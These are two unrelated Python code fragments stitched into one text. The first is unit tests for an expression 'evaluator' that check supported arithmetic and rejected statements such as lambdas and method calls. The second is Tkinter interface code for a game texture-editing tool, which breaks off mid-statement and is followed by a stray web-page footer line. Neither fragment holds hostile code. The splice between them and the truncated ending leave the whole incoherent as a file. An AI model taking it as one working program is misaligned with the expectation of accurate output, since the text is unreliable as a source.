({}, "a + b", {"a": 2, "b": 3}, 2 + 3),
(
{},
"timedelta_to_seconds(a - b)",
{
"a": "2016-01-01T11:30:00.000000Z",
"b": "2016-01-01T11:00:00.000000Z"
},
30 * 60
),
# supports string manipulation
({}, "str(a)+'text'", {"a": 3}, "3text"),
# context can contain expressions
(
{"age": 1},
"a + b",
{
"a": {
"type": "property_name",
"property_name": "age"
},
"b": 5
},
1 + 5
),
# context variable can itself be evaluation expression
(
{},
"age + b",
{
"age": {
"type": "evaluator",
"statement": "a",
"context_variables": {
"a": 2
}
},
"b": 5
},
5 + 2
),
({}, "a + b", {"a": Decimal(2), "b": Decimal(3)}, Decimal(5)),
({}, "a + b", {"a": Decimal(2.2), "b": Decimal(3.1)}, Decimal(5.3)),
({}, "range(3)", {}, [0, 1, 2]),
])
def test_valid_eval_expression(self, source_doc, statement, context, expected_value):
expression = ExpressionFactory.from_spec({
"type": "evaluator",
"statement": statement,
"context_variables": context
})
# almostEqual handles decimal (im)precision - it means "equal to 7 places"
self.assertAlmostEqual(expression(source_doc), expected_value)
@generate_cases([
# context must be a dict
({}, "2 + 3", "text context"),
({}, "2 + 3", 42),
({}, "2 + 3", []),
# statement must be string
({}, 2 + 3, {"a": 2, "b": 3})
])
def test_invalid_eval_expression(self, source_doc, statement, context):
with self.assertRaises(BadSpecError):
ExpressionFactory.from_spec({
"type": "evaluator",
"statement": statement,
"context_variables": context
})
@generate_cases([
("a + (a*b)", {"a": 2, "b": 3}, 2 + (2 * 3)),
("a-b", {"a": 5, "b": 2}, 5 - 2),
("a+b+c+9", {"a": 5, "b": 2, "c": 8}, 5 + 2 + 8 + 9),
("a*b", {"a": 2, "b": 23}, 2 * 23),
("a*b if a > b else b -a", {"a": 2, "b": 23}, 23 - 2),
("'text1' if a < 5 else 'text2'", {"a": 4}, 'text1'),
("a if a else b", {"a": 0, "b": 1}, 1),
("a if a else b", {"a": False, "b": 1}, 1),
("a if a else b", {"a": None, "b": 1}, 1),
("range(1, a)", {"a": 5}, [1, 2, 3, 4]),
("a or b", {"a": 0, "b": 1}, True),
("a and b", {"a": 0, "b": 1}, False),
# ranges > 100 items aren't supported
("range(200)", {}, None),
("a and not b", {"a": 1, "b": 0}, True),
])
def test_supported_evaluator_statements(self, eq, context, expected_value):
self.assertEqual(eval_statements(eq, context), expected_value)
@generate_cases([
# variables can't be strings
("a + b", {"a": 2, "b": 'text'}),
# missing context, b not defined
("a + (a*b)", {"a": 2}),
# power function not supported
("a**b", {"a": 2, "b": 23}),
# lambda not supported
("lambda x: x*x", {"a": 2}),
# max function not defined
("max(a, b)", {"a": 3, "b": 5}),
# method calls not allowed
('"WORD".lower()', {"a": 5}),
])
def test_unsupported_evaluator_statements(self, eq, context):
with self.assertRaises(InvalidExpression):
eval_statements(eq, context)
expression = ExpressionFactory.from_spec({
"type": "evaluator",
"statement": eq,
"context_variables": context
})
self.assertEqual(expression({}), None)
@generate_cases([
("a/b", {"a": 5, "b": None}, TypeError),
("a/b", {"a": 5, "b": 0}, ZeroDivisionError),
])
def test_errors_in_evaluator_statements(self, eq, context, error_type):
with self.assertRaises(error_type):
eval_statements(eq, context)
expression = ExpressionFactory.from_spec({
"type": "evaluator",
"statement": eq,
"context_variables": context
})
self.assertEqual(expression({}), None)
class TestEvaluatorTypes(SimpleTestCase):
def test_datatype(self):
spec = {
"type": "evaluator",
"statement": '1.0 + a',
"context_variables": {'a': 1.0}
}
self.assertEqual(type(ExpressionFactory.from_spec(spec)({})), float)
spec['datatype'] = 'integer'
self.assertEqual(type(ExpressionFactory.from_spec(spec)({})), int)
class TestFormsExpressionSpec(TestCase):
@classmethod
def setUpClass(cls):
super(TestFormsExpressionSpec, cls).setUpClass()
cls.domain = uuid.uuid4().hex
factory = CaseFactory(domain=cls.domain)
[cls.case] = factory.create_or_update_case(CaseStructure(attrs={'create': True}))
cls.forms = [f.to_json() for f in FormAccessors(cls.domain).get_forms(cls.case.xform_ids)]
# redundant case to create extra forms that shouldn't be in the results for cls.case
[cls.case_b] = factory.create_or_update_case(CaseStructure(attrs={'create': True}))
@classmethod
def tearDownClass(cls):
delete_all_xforms()
delete_all_cases()
super(TestFormsExpressionSpec, cls).tearDownClass()
def _make_expression(self, xmlns=None):
spec = {
"type": "get_case_forms",
"case_id_expression": {
"type": "property_name",
"property_name": "_id"
},
}
if xmlns:
spec['xmlns'] = [xmlns]
return ExpressionFactory.from_spec(spec)
def test_evaluation(self):
expression = self._make_expression()
context = EvaluationContext({"domain": self.domain}, 0)
forms = expression(self.case.to_json(), context)
self.assertEqual(len(forms), 1)
self.assertEqual(forms, self.forms)
def test_wrong_domain(self):
expression = self._make_expression()
context = EvaluationContext({"domain": "wrong-domain"}, 0)
forms = expression(self.case.to_json(), context)
self.assertEqual(forms, [])
def test_correct_xmlns(self):
expression = self._make_expression('http://commcarehq.org/case')
context = EvaluationContext({"domain": self.domain}, 0)
forms = expression(self.case.to_json(), context)
self.assertEqual(len(forms), 1)
self.assertEqual(forms, self.forms)
| |
)
self.datTextureTreeBg.place(relx=0.5, rely=0.5, anchor='center')
self.datTextureTreeFiltersMsg = ttk.Label( self.datTextureTree, text='Either no textures were found, or you have them filtered out.', background='white' )
# Item highlighting. The order of the configs below reflects (but does not dictate) the priority of their application
self.datTextureTree.tag_configure( 'warn', background='#f6c6d7' ) # light red
self.datTextureTree.tag_configure( 'mipmap', background='#d7e1ff' ) # light blue; same as SA tab 'marked' items
# File Tree end
defaultCanvasDimensions = 258 # Default size for the height and width of the texture viewing canvas. 256 + 1px border
self.imageManipTabs = ttk.Notebook(datTabRow2)#, width=330
self.textureTreeImagePane = Tk.Frame(self.imageManipTabs)
self.imageManipTabs.add( self.textureTreeImagePane, text=' Image ', sticky='nsew' )
canvasOptionsPane = ttk.Frame(self.textureTreeImagePane, padding='0 15 0 0')
ttk.Checkbutton( canvasOptionsPane, command=self.updateCanvasGrid, text='Show Grid', variable=generalBoolSettings['showCanvasGrid'] ).pack(side='left', padx=7)
ttk.Checkbutton( canvasOptionsPane, command=updateCanvasTextureBoundary, text='Show Texture Boundary', variable=generalBoolSettings['showTextureBoundary'] ).pack(side='left', padx=7)
canvasOptionsPane.pack()
self.textureDisplayFrame = Tk.Frame(self.textureTreeImagePane) # The border and highlightthickness for the canvas below must be set to 0, so that the canvas has a proper origin of (0, 0).
self.textureDisplay = Tk.Canvas(self.textureDisplayFrame, width=defaultCanvasDimensions, height=defaultCanvasDimensions, borderwidth=0, highlightthickness=0) #, background='blue'
# alternate dynamic imaging technique: http://stackoverflow.com/questions/3482081/tkinter-label-widget-with-image-update
self.textureDisplay.pack( expand=1 ) # fill='both', padx=10, pady=10
self.updateCanvasGrid()
self.textureDisplay.defaultDimensions = defaultCanvasDimensions
self.textureDisplayFrame.pack( expand=1 )
datPreviewPaneBottomRow = Tk.Frame(self.textureTreeImagePane) # This object uses grid alignment for its children so that they're centered and equally spaced amongst each other.
self.previousDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('previousDatButton') )
self.previousDatButton.grid( column=0, row=0, ipadx=5, pady=(10, 0), sticky='e' )
self.previousDatText = Tk.StringVar()
ToolTip( self.previousDatButton, textvariable=self.previousDatText, delay=300, location='n' )
datFileDetails = ttk.Labelframe( datPreviewPaneBottomRow, text=' File Details ', labelanchor='n' )
self.datFilesizeText = Tk.StringVar()
self.datFilesizeText.set('File Size: ')
ttk.Label(datFileDetails, textvariable=self.datFilesizeText, width=23)
self.totalTextureSpaceText = Tk.StringVar()
self.totalTextureSpaceText.set('Total Texture Size: ')
ttk.Label(datFileDetails, textvariable=self.totalTextureSpaceText)
self.texturesFoundText = Tk.StringVar()
self.texturesFoundText.set('Textures Found: ')
ttk.Label(datFileDetails, textvariable=self.texturesFoundText)
self.texturesFilteredText = Tk.StringVar()
self.texturesFilteredText.set('Filtered Out: ')
ttk.Label(datFileDetails, textvariable=self.texturesFilteredText)
for widget in datFileDetails.winfo_children():
widget.pack( padx=20, pady=0, anchor='w' )
datFileDetails.grid( column=1, row=0 )
self.nextDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('nextDatButton') )
self.nextDatButton.grid( column=2, row=0, ipadx=5, pady=(10, 0), sticky='w' )
self.nextDatText = Tk.StringVar()
ToolTip( self.nextDatButton, textvariable=self.nextDatText, delay=300, location='n' )
datPreviewPaneBottomRow.columnconfigure(0, weight=1)
datPreviewPaneBottomRow.columnconfigure(1, weight=1)
datPreviewPaneBottomRow.columnconfigure(2, weight=1)
datPreviewPaneBottomRow.rowconfigure(0, weight=1)
datPreviewPaneBottomRow.pack(side='bottom', pady=7, fill='x')
# Palette tab
self.palettePane = ttk.Frame( self.imageManipTabs, padding='16 0 0 0' )
self.imageManipTabs.add( self.palettePane, text=' Palette ', state='disabled' )
self.imageManipTabs.bind( '<<NotebookTabChanged>>', self.imageManipTabChanged )
# Left-side column (canvas and bg color changer button)
paletteTabLeftSide = Tk.Frame(self.palettePane)
self.paletteCanvas = Tk.Canvas( paletteTabLeftSide, borderwidth=3, relief='ridge', background='white', width=187, height=405 ) #old height:373
paletteBgColorChanger = ttk.Label( paletteTabLeftSide, text='Change Background Color', foreground='#00F', cursor='hand2' )
self.paletteCanvas.paletteEntries = []
self.paletteCanvas.itemColors = {}
paletteBgColorChanger.bind( '<1>', togglePaletteCanvasColor )
self.paletteCanvas.pack( pady=11, padx=0 )
self.paletteCanvas.entryBorderColor = '#3399ff' # This is the same blue as used for treeview selection highlighting
paletteBgColorChanger.pack()
paletteTabLeftSide.grid( column=0, row=0 )
# Right-side column (palette info)
paletteDetailsFrame = Tk.Frame(self.palettePane)
self.paletteDataText = Tk.StringVar( value='Data Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteDataText ).pack(pady=3)
self.paletteHeaderText = Tk.StringVar( value='Header Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteHeaderText ).pack(pady=3)
self.paletteTypeText = Tk.StringVar( value='Palette Type:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteTypeText ).pack(pady=3)
self.paletteMaxColorsText = Tk.StringVar( value='Max Colors:')
ttk.Label( paletteDetailsFrame, textvariable=self.paletteMaxColorsText ).pack(pady=3)
self.paletteStatedColorsText = Tk.StringVar( value='Stated Colors:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteStatedColorsText ).pack(pady=3)
#self.paletteActualColorsText = Tk.StringVar( value='Actual Colors:' ) # todo:reinstate?
#ttk.Label( paletteDetailsFrame, textvariable=self.paletteActualColorsText ).pack(pady=3)
paletteDetailsFrame.grid( column=1, row=0, pady=60, sticky='n' )
self.palettePane.columnconfigure( 0, weight=1 )
self.palettePane.columnconfigure( 1, weight=2 )
# Add a help button to explain the above
helpText = ( 'Max Colors is the maximum number of colors this texture has space for with its current texture format.\n\n'
'Stated Colors is the number of colors that the palette claims are actually used by the texture (described by the palette data header).\n\n'
'The number of colors actually used may still differ from both of these numbers, especially for very old texture hacks.' )
helpBtn = ttk.Label( self.palettePane, text='?', foreground='#445', cursor='hand2' )
helpBtn.place( relx=1, x=-17, y=18 )
helpBtn.bind( '<1>', lambda e, message=helpText: msg(message, 'Palette Properties') )
# Model parts tab
self.modelPropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.imageManipTabs.add( self.modelPropertiesPane, text='Model', state='disabled' )
self.modelPropertiesPane.interior.imageDataHeaders = []
self.modelPropertiesPane.interior.nonImageDataHeaders = [] # Not expected
self.modelPropertiesPane.interior.textureStructs = [] # Direct model attachments
self.modelPropertiesPane.interior.headerArrayStructs = [] # Used for animations
self.modelPropertiesPane.interior.unexpectedStructs = []
self.modelPropertiesPane.interior.materialStructs = []
self.modelPropertiesPane.interior.displayObjects = []
self.modelPropertiesPane.interior.hideJointChkBtn = None
self.modelPropertiesPane.interior.polyDisableChkBtn = None
self.modelPropertiesPane.interior.opacityEntry = None
self.modelPropertiesPane.interior.opacityBtn = None
self.modelPropertiesPane.interior.opacityScale = None
# Texture properties tab
self.texturePropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.texturePropertiesPane.flagWidgets = [] # Useful for the Flag Decoder to more easily find widgets that need updating
self.imageManipTabs.add( self.texturePropertiesPane, text='Properties', state='disabled' )
self.imageManipTabs.pack( fill='both', expand=1 )
datTabRow2.pack(fill='both', expand=1)
# End of DAT tab row 2, the image tree and info pane.
# Tab 4 | Structural Analysis
self.savTab = ttk.Frame( self.mainTabFrame ) # SAV = Structural Analysis View
self.mainTabFrame.add( self.savTab, text=' Structural Analysis ' )
self.dnd.bindtarget( self.savTab, lambda event: dndHandler( event, 'savTab' ), 'text/uri-list' )
# Create the treeview on the left where structures will be browsed
yScroller = Tk.Scrollbar( self.savTab )
xScroller = Tk.Scrollbar( self.savTab, orient='horizontal' )
self.fileStructureTree = ttk.Treeview( self.savTab, columns='offset', yscrollcommand=yScroller.set, xscrollcommand=xScroller.set, selectmode='extended' )
self.fileStructureTree.heading( '#0', anchor='center' ) # , command=function
self.fileStructureTree.column( '#0', anchor='center', minwidth=200, stretch=True, width=180 ) # "#0" is implicit in the columns definition above.
self.fileStructureTree.heading( 'offset', anchor='center', text='Offset' )
self.fileStructureTree.column( 'offset', anchor='e', minwidth=60, stretch=False, width=76 )
self.fileStructureTree.grid( column=0, row=0, sticky="nsew" )
self.fileStructureTree.tag_configure( 'marked', background='#d7e1ff' ) # light blue; same as mipmap highlight color
# Configure and attach the scrollbars
yScroller.config( command=self.fileStructureTree.yview )
xScroller.config( command=self.fileStructureTree.xview )
yScroller.grid( column=1, row=0, sticky="nsew" )
xScroller.grid( column=0, row=1, columnspan=2, sticky="nsew" )
self.fileStructureTree.yScroller = yScroller
self.fileStructureTree.xScroller = xScroller
# Add treeview event handlers
self.fileStructureTree.bind( '<<TreeviewSelect>>', onStructureTreeSelect )
self.fileStructureTree.bind( '<<TreeviewOpen>>', growStructuralAnalysisTree ) # Occurs when expanding items with children
#self.fileStructureTree.bind( '<Double-1>', onStructureTreeDoubleClick ) # todo: find workaround. some kind of conflict prevents this from working
self.fileStructureTree.bind( "<3>", createStructureTreeContextMenu ) # Right-click
# Create the frame on the right where structure properties will be populated
self.structurePropertiesFrame = VerticalScrolledFrame( self.savTab, width=378 )
self.structurePropertiesFrame.grid( column=2, row=0, sticky="nsew" )
# Configure sizing/resizing behavior of the grid cells
self.savTab.grid_columnconfigure( 0, weight=5 )
self.savTab.grid_columnconfigure( 1, weight=0 )
self.savTab.grid_columnconfigure( 2, weight=1, minsize=378 )
self.savTab.grid_rowconfigure( 0, weight=1 )
# Place the DnD background texture
self.fileStructureTreeBg = Tk.Label( self.fileStructureTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.fileStructureTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
self.fileStructureTree.allIids = []
# Place the search button (and its hover cursor & text)
self.fileStructureTree.searchBtn = Tk.Label( self.fileStructureTree, image=self.imageBank('searchIcon'), bg='white', borderwidth=0, highlightthickness=0 )
self.fileStructureTree.searchBtn.place( rely=1, x=3, y=-6, anchor='sw' )
self.fileStructureTree.searchBtn.bind( '<1>', lambda event: structSearchWindow() )
self.fileStructureTree.searchBtn.config( cursor='hand2' )
ToolTip( self.fileStructureTree.searchBtn, text='Structure Search (CTRL-F)', delay=500 )
self.structPropFrameWrapLength = 300 # The Label wrap length for text inside the structurePropertiesFrame.
# Tab 5 | Manual Texture Replacement
self.mtrTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.mtrTab, text=' Manual Placement ' )
self.dnd.bindtarget( self.mtrTab, lambda event: dndHandler( event, 'mtrTab' ), 'text/uri-list' )
# MTR tab, row 1
mtrTabRow1 = ttk.Frame( self.mtrTab, padding="12 12 12 0" ) # Left, Top, Right, Bottom
ttk.Label( mtrTabRow1, text=" DAT / USD:" ).pack( side='left' )
datDestinationLabel2 = ttk.Entry( mtrTabRow1, textvariable=self.datDestination ) #, font='TkTextFont'
datDestinationLabel2.pack( side='left', fill='x', expand=1, padx=12 )
mtrTabRow1.pack(fill='x', side='top')
# MTR tab, row 2 | Directions
ttk.Label( self.mtrTab, text="This tab gives you the freedom to write a texture into any exact location."
"\nThat even includes any textures that don't normally appear in the DAT Texture Tree."
"\nYou can riffle through the 'Program Usage.txt' file for information on how to use this." ).pack(pady=9)
# MTR tab, row 3 | Texture input
self.mtrTabRow2 = ttk.Frame(self.mtrTab, padding="12 6 0 0") # Left, Top, Right, Bottom
self.sourceTexturesText = Tk.StringVar()
self.sourceTexturesText.set("Texture(s):\n (0 total)")
ttk.Label(self.mtrTabRow2, textvariable=self.sourceTexturesText).pack(side='left') #.grid(column=1, row=1, sticky='ne')
self.imageTextArea = ScrolledText(self.mtrTabRow2, width=74, height=14, wrap='word', font='TkTextFont')
self.imageTextArea.pack(side='left', fill='x', expand=1, padx=12)
self.imageTextArea.bind('<KeyRelease>', onTextAreaKeyUp)
arrowFont = tkFont.Font(family='Courier', size='8', weight='bold')
##self.imageTextArea.tag_config('offsetArrow', foreground='#0066FF', font=arrowFont)
self.imageTextArea.tag_config('offsetArrow', foreground='#119922', font=arrowFont)
self.imageTextArea.tag_config('successfulOverwrite', background='#99FF99', font='TkTextFont')
self.imageTextArea.tag_config('warningOverwrite', background='#FFFF99', font='TkTextFont')
self.imageTextArea.tag_config('failedOverwrite', background='#FF9999', font='TkTextFont')
mtrBtnFrame = ttk.Frame(self.mtrTabRow2, padding=12)
ttk.Button(mtrBtnFrame, text=" Select Textures ", command=importImageFiles).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Scan folder \n structure", command=scanFolderStructure).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Clear Highlighting ", command=clearHighlighting).pack(pady=3)
ttk.Separator(mtrBtnFrame, orient='horizontal').pack(fill='x', padx=6, pady=7)
ttk.Button(mtrBtnFrame, text="Write textures into DAT", command=overwriteImagesManually, width=23).pack(pady=3)
self.mtrSaveBackup = Tk.BooleanVar()
self.mtrSaveBackup.set(1)
ttk.Checkbutton( mtrBtnFrame, text=' Keep a backup of \n the original DAT', variable=self.mtrSaveBackup ).pack()
mtrBtnFrame.pack(side='right')
self.mtrTabRow2.pack(fill='x', anchor='n')
battleFrame = Tk.Frame( self.mtrTab )
ttk.Label( battleFrame, image=self.imageBank('cathedralBattle') ).place( relx=0.5, rely=0.5, anchor='center' )
battleFrame.pack( fill='both', expand=1 )
# Tab 6 | Character Color Converter (CCC)
self.cccTab = ttk.Frame(self.mainTabFrame)
self.mainTabFrame.add(self.cccTab, text=' CCC ')
ttk.Label(self.cccTab, text=' Character Color Converter ', font="-weight bold").pack(pady=23)
cccFileSelectionRow = Tk.Frame(self.cccTab)
ttk.Label(cccFileSelectionRow, text="Step 1 | Choose the source file you'd like to convert." \
"\n\n(If you're on the Disc File Tree, you can right-click \non the file and select 'Set as CCC Source File'.)", wraplength=350).grid(column=0, row=0, padx=15, pady=25)
cccTabRow2RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button(cccTabRow2RightCell, text=' Within a Disc ', command=cccPointToDiscTab).grid(column=0, row=0)
ttk.Button(cccTabRow2RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('source')).grid(column=1, row=0)
self.cccSourceCanvas = Tk.Canvas(cccTabRow2RightCell, width=290, height=64, borderwidth=0, highlightthickness=0)
self.cccIdentifiersXPos = 90
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ')
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 44, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Costume Color: ')
self.cccSourceCanvas.insigniaImage = None
self.cccSourceCanvas.grid(column=0, row=1, columnspan=2, pady=7)
cccTabRow2RightCell.grid(column=1, row=0)
ttk.Label(cccFileSelectionRow, text='Step 2 | Choose a "destination" file of the desired color (and same character). This file will have its texture data replaced with the textures ' \
"from the file above.\nSo make sure you have a back-up of this if you'd like to use it again later.", wraplength=350).grid(column=0, row=1, padx=15, pady=25)
cccTabRow4RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button( cccTabRow4RightCell, text=' Within a Disc ', command=cccPointToDiscTab ).grid( column=0, row=0 )
ttk.Button( cccTabRow4RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('dest') ).grid( column=1, row=0 )
self.cccDestCanvas = Tk.Canvas( cccTabRow4RightCell, width=290, height=64, borderwidth=0, highlightthickness=0 ) #, background='blue'
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ' )
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.